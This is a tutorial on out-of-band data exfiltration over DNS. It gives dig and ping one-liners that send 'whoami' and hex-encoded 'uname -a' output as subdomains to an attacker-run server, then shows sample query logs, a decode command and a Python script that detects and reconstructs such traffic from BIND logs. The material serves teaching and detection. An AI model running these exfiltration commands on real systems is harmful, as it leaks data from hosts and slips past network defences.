In an Out-Of-Band (OOB) situation where direct responses to requests are unavailable, we can leverage DNS (specifically UDP) to exfiltrate data. In this example, we'll demonstrate how to use `dig` to query DNS and exfiltrate information such as the username (`whoami`), and how to handle more complex data like the output of `uname -a` by encoding it before exfiltration.
If you haven't configured your OOB server yet, you can follow this guide:
https://gist.github.com/Spix0r/9661d448a08bf0703b005c3c64aef560
Imagine that we are in a situation where we can only use DNS to communicate, as direct responses are not available. We'll use the `dig` command to exfiltrate data to our own DNS server. For example:

```sh
dig a +short $(whoami).oob-server.com
```
A sample DNS query log looks like this:

```log
23-Sep-2024 14:30:42.096 queries: info: client @0x7ff012399f00 192.168.50.10#51234 (spidey.oob-server.com): query: spidey.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]
```
Here, we are exfiltrating the username via the DNS A record query, which is captured by our DNS server.
But what if the data you need to exfiltrate is more complex, such as the output of `uname -a`, which contains spaces and other characters that cannot appear in a DNS label? This requires encoding before exfiltration. You can use `hex` or `base64` encoding to safely transmit the data via DNS queries.
For instance, to exfiltrate the output of `uname -a`, we can use the following command:

```sh
# od -t x1 prints 16 bytes (32 hex characters) per line, so each chunk fits in one DNS label;
# sed strips the spaces between the bytes. Resolving each name is what sends the A query;
# the ping itself is expected to fail and its output can be ignored.
uname -a | od -A n -t x1 | sed 's/ *//g' | while read exfil; do ping -c 1 "$exfil.oob-server.com"; done
```

This command converts the output of `uname -a` to a hex string, splits it into 32-character chunks, and triggers a DNS lookup for each chunk as a subdomain of our OOB server. A sample log of these queries would look like this:
```log
23-Sep-2024 14:31:13.012 queries: info: client @0x7ff012399f00 192.168.50.5#44650 (44617277696e20596173686f732d4d61.oob-server.com): query: 44617277696e20596173686f732d4d61.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]
23-Sep-2024 14:31:13.320 queries: info: client @0x7ff112399f90 192.168.50.15#42485 (63426f6f6b2d50726f2e6c6f63616c20.oob-server.com): query: 63426f6f6b2d50726f2e6c6f63616c20.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]
23-Sep-2024 14:31:13.620 queries: info: client @0x7ff112399f90 192.168.52.15#57257 (32312e312e302044617277696e204b65.oob-server.com): query: 32312e312e302044617277696e204b65.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]
```
Once the DNS queries have been captured, the next step is to extract the hex-encoded subdomains from the logs, concatenate them in the order they arrived, and decode the data back into its original form. Here's a command to decode it:

```sh
echo "44617277696e20596173686f732d4d6163426f6f6b2d50726f2e6c6f63616c2032312e312e302044617277696e204b65726e656c2056657273696f6e2032312e312e303a20576564204f63742031332031373a33333a32342050445420323032313b20726f6f743a786e752d383031392e34312e357e312f52454c454153455f41524d36345f54383130312061726d36340a" | xxd -r -p
```

Resulting in the original data:

```
Darwin Spideys-MacBook-Pro.local 21.1.0 Darwin Kernel Version 21.1.0: Wed Oct 13 17:33:24 PDT 2021; root:xnu-8019.41.5~1/RELEASE_ARM64_T8101 arm64
```
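The same extract-and-decode step is what a log analyst does when triaging a DNS server for this kind of traffic. The Python script below is an added example, not part of the original gist: it parses BIND 9 `queries`-category lines like the ones above, flags leading labels that look like hex chunks, groups them by client and parent domain in log order, and decodes them. The log lines inside it are constructed for the example (the hex labels are the three fragments shown above, the client addresses and the benign `mail` query are made up), and `MIN_HEX_LABEL` is a constructed threshold.

```python
import re
from collections import OrderedDict

# Assumed log format: BIND 9 "queries" category lines, as shown on this page.
# The regex captures the client address and the queried name.
QUERY_LINE = re.compile(
    r"client @0x[0-9a-f]+ (?P<client>[\d.]+)#\d+ \([^)]*\): query: "
    r"(?P<qname>\S+) IN (?P<qtype>\S+)"
)

# Detection heuristic: a leading label made only of hex digits, even in length and
# at least this long. `od -t x1` emits 16 bytes per line, so the chunks on this page
# are 32 hex characters. The threshold is a constructed value; tune it for your zone.
MIN_HEX_LABEL = 16
HEX_ONLY = re.compile(r"^[0-9a-f]+$")

# Constructed sample log (not a real capture): three hex fragments from one client,
# plus a plain username query and a benign MX lookup that must not be flagged.
SAMPLE_LOG = [
    "23-Sep-2024 14:30:42.096 queries: info: client @0x7ff012399f00 192.168.50.10#51234 (spidey.oob-server.com): query: spidey.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]",
    "23-Sep-2024 14:31:13.012 queries: info: client @0x7ff012399f00 192.168.50.5#44650 (44617277696e20596173686f732d4d61.oob-server.com): query: 44617277696e20596173686f732d4d61.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]",
    "23-Sep-2024 14:31:13.100 queries: info: client @0x7ff012399f00 192.168.50.10#51240 (mail.oob-server.com): query: mail.oob-server.com IN MX -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]",
    "23-Sep-2024 14:31:13.320 queries: info: client @0x7ff112399f90 192.168.50.5#42485 (63426f6f6b2d50726f2e6c6f63616c20.oob-server.com): query: 63426f6f6b2d50726f2e6c6f63616c20.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]",
    "23-Sep-2024 14:31:13.620 queries: info: client @0x7ff112399f90 192.168.50.5#57257 (32312e312e302044617277696e204b65.oob-server.com): query: 32312e312e302044617277696e204b65.oob-server.com IN A -E(0)DC (192.158.1.1) [ECS 192.168.100.0/24/0]",
]


def parse_query_line(line):
    """Return (client_ip, qname) for a BIND query-log line, or None if it does not match."""
    m = QUERY_LINE.search(line)
    if not m:
        return None
    return m.group("client"), m.group("qname").rstrip(".")


def is_hex_label(label):
    """True if the label is long enough, even-length and consists only of hex digits."""
    return (
        len(label) >= MIN_HEX_LABEL
        and len(label) % 2 == 0
        and HEX_ONLY.match(label) is not None
    )


def find_hex_chunks(log_lines):
    """Group suspicious leading labels by (client, parent domain), preserving log order."""
    chunks = OrderedDict()
    for line in log_lines:
        parsed = parse_query_line(line)
        if parsed is None:
            continue
        client, qname = parsed
        label, _, parent = qname.partition(".")
        label = label.lower()
        if is_hex_label(label):
            chunks.setdefault((client, parent), []).append(label)
    return chunks


def reconstruct(chunks):
    """Join each group's labels in arrival order and decode the hex back to bytes."""
    return {key: bytes.fromhex("".join(labels)) for key, labels in chunks.items()}


def report(log_lines):
    """Run the whole pipeline; returns a list of (client, parent, decoded_bytes)."""
    chunks = find_hex_chunks(log_lines)
    return [(client, parent, data) for (client, parent), data in reconstruct(chunks).items()]


if __name__ == "__main__":
    for client, parent, data in report(SAMPLE_LOG):
        print(f"{client} -> {parent}: {len(data)} bytes: {data!r}")
```

Two caveats when running this against real logs: hex-looking labels do occur legitimately (cache-busting tokens, some CDN and telemetry hostnames), so a single hit is a weak signal and the stronger one is many unique, never-repeated labels from one client to one zone in a short window; and a sender can just as easily use base32 or base64url, so a label-entropy or unique-subdomain-rate check belongs alongside the hex rule rather than instead of it.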
This is a simple yet powerful method to exfiltrate data using DNS in OOB scenarios. By encoding the data and transmitting it via DNS queries, attackers can bypass traditional network protections and sneak data out of compromised systems.
Note: This technique should be used strictly for research and educational purposes. Always ensure you have appropriate authorization before conducting any security assessments involving data exfiltration.